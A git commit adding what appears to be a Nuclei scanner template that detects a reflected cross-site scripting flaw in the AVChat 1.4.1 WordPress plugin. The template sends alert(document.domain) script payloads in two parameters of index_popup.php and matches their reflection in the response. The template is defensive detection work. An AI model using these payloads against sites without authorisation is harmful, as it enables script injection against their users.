Create wp-avchat-3-xss.yaml

patch-1
Dhiyaneshwaran 2022-08-04 22:10:29 +05:30 committed by GitHub
parent c24499d0e1
commit 404f1d56eb
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 37 additions and 0 deletions

View File

@ -0,0 +1,37 @@
id: wp-avchat-3-xss
info:
name: AVChat Video Chat 1.4.1 - index_popup.php Multiple Parameters Reflected XSS
author: DhiyaneshDK
severity: medium
description: |
The Community Lite Video Chat WordPress plugin was affected by an index_popup.php Multiple Parameters Reflected XSS security vulnerability.
reference:
- https://codevigilant.com/disclosure/wp-plugin-avchat-3-a3-cross-site-scripting-xss/
- https://wpscan.com/vulnerability/fce99c82-3958-4c17-88d3-6e8fa1a11e59
metadata:
verified: true
tags: wordpress,wp-plugin,xss,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/avchat-3/index_popup.php?movie_param=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&FB_appId=FB_appId%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&"
matchers-condition: and
matchers:
- type: word
words:
- 'FB_appId"><script>alert(document.domain)</script>"'
- 'swfobject.embedSWF("</script><script>alert(document.domain)</script>"'
part: body
- type: word
words:
- 'text/html'
part: header
- type: status
status:
- 200